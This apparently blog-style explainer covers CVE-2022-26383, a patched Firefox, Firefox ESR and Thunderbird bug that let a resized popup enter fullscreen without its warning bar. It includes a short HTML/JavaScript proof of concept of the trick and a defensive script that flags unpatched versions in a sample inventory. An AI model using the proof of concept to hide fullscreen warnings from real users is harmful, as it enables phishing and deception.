Let’s talk about CVE-2022-26383, a quirky but dangerous bug that affected three major Mozilla products: Firefox, Firefox ESR, and Thunderbird—all before their March 2022 updates. Though this flaw sounds technical, the idea is simple: with the right moves, a website could sneak past browser security to show full-screen content without alerting you. That’s bad news if an attacker wants to fool or scam users.
What Is CVE-2022-26383?
Browsers are supposed to *warn you* when they switch to fullscreen—think of that gray bar at the top that says, “You are now viewing full-screen.” But with this bug, if a website pops up a window, asks for fullscreen, then resizes it just right, the notification bar fails to show up.
> Impacted Versions:  
> - Firefox < 98  
> - Firefox ESR < 91.7  
> - Thunderbird < 91.7
The user might not notice anything is off and could be tricked by a phishing page that imitates a legitimate site's look and feel.
The trick, step by step:
- The page opens a popup window and asks it to go fullscreen.
- It rapidly resizes the popup using JavaScript.
- If timed just right, the fullscreen notification doesn't show.
Here’s a simple version of the trick (you won’t see this work on today’s browsers!):
<!DOCTYPE html>
<html>
<body>
<script>
function openSneakyPopup() {
  // Open a popup
  let popup = window.open(
    "", 
    "Sneaky", 
    "width=600,height=400"
  );
  popup.document.write(`
    <button id='fs'>GoFullscreen</button>
    <script>
      document.getElementById('fs').onclick = function() {
        // Request fullscreen when button is clicked
        document.body.requestFullscreen();
        // Sneakily resize after request
        setTimeout(() => {
          window.resizeTo(800, 600);
        }, 50); // Triggers the bug in old Firefox
      }
    <\/script>
  `);
}
</script>
<button onclick="openSneakyPopup()">Open Exploit Popup</button>
</body>
</html>
If run in a vulnerable version of Firefox, this code opens a popup, requests fullscreen, and resizes to hide the notification bar. The user never sees the alert!
How Is It Fixed?
Mozilla patched this bug in March 2022. From Firefox 98 and Firefox ESR/Thunderbird 91.7 onward, the browser correctly shows the notification bar even after the popup is resized, so attackers lose their trick.
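Since the only defense is running a fixed release, the practical check is whether an installed version sits below the thresholds quoted in the advisory (Firefox 98, Firefox ESR 91.7, Thunderbird 91.7). The following is an added example, not code from the original post or from Mozilla: it parses dotted version strings numerically (so "91.10" is not mistaken for being older than "91.7"), routes "esr" builds to the ESR threshold, and flags the hosts in a constructed inventory that still need the March 2022 update. The hostnames, product names and version numbers in the sample are assumptions made up for the demonstration.

```javascript
// Added example (not part of the original post): check whether a reported
// Mozilla product version still lacks the CVE-2022-26383 fix.
// Thresholds come from the advisory text above.
const FIXED_VERSIONS = {
  firefox: "98.0",
  "firefox-esr": "91.7",
  thunderbird: "91.7",
};

// Parse "91.6.1esr" or "98.0.2" into an array of integers, ignoring any suffix.
function parseVersion(str) {
  const m = /^(\d+(?:\.\d+)*)/.exec(String(str).trim());
  if (!m) throw new Error(`unparseable version: ${str}`);
  return m[1].split(".").map(Number);
}

// Compare two dotted versions component by component; returns -1, 0 or 1.
// Missing trailing components count as 0, so "91.7" equals "91.7.0".
function compareVersions(a, b) {
  const pa = parseVersion(a), pb = parseVersion(b);
  const n = Math.max(pa.length, pb.length);
  for (let i = 0; i < n; i++) {
    const x = pa[i] || 0, y = pb[i] || 0;
    if (x !== y) return x < y ? -1 : 1;
  }
  return 0;
}

// True when `version` of `product` is older than the first fixed release.
function isAffected(product, version) {
  const key = product.toLowerCase().replace(/\s+/g, "-");
  // A Firefox build tagged "esr" is on the ESR train; use the ESR threshold.
  const effective = key === "firefox" && /esr/i.test(version) ? "firefox-esr" : key;
  const fixed = FIXED_VERSIONS[effective];
  if (!fixed) throw new Error(`unknown product: ${product}`);
  return compareVersions(version, fixed) < 0;
}

// Constructed sample inventory (hypothetical hosts and versions).
const SAMPLE_INVENTORY = [
  { host: "ws-01.example", product: "Firefox", version: "97.0.2" },
  { host: "ws-02.example", product: "Firefox", version: "98.0" },
  { host: "ws-03.example", product: "Firefox", version: "91.6.1esr" },
  { host: "ws-04.example", product: "Thunderbird", version: "91.7.0" },
];

// Return the hosts whose browser or mail client still needs the March 2022 update.
function findUnpatched(inventory) {
  return inventory
    .filter((e) => isAffected(e.product, e.version))
    .map((e) => e.host);
}

console.log(findUnpatched(SAMPLE_INVENTORY)); // ["ws-01.example", "ws-03.example"]
```

The numeric comparison matters more than it looks: a plain string comparison would call "91.10.0" older than "91.7" and miss a patched host, while a naive float parse would drop the third component entirely.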
References
- Mozilla Security Advisory 2022-09
- NIST NVD Entry CVE-2022-26383
- Mozilla Bugzilla #1757236
TL;DR
CVE-2022-26383 was a slick bug that let a popup window enter fullscreen without the browser showing its warning, fooling both you and the browser. If you’re using an updated browser, you’re safe. If not, now you know why it’s dangerous and how easy it was to abuse.
Timeline
Published on: 12/22/2022 20:15:00 UTC
Last modified on: 12/30/2022 15:02:00 UTC
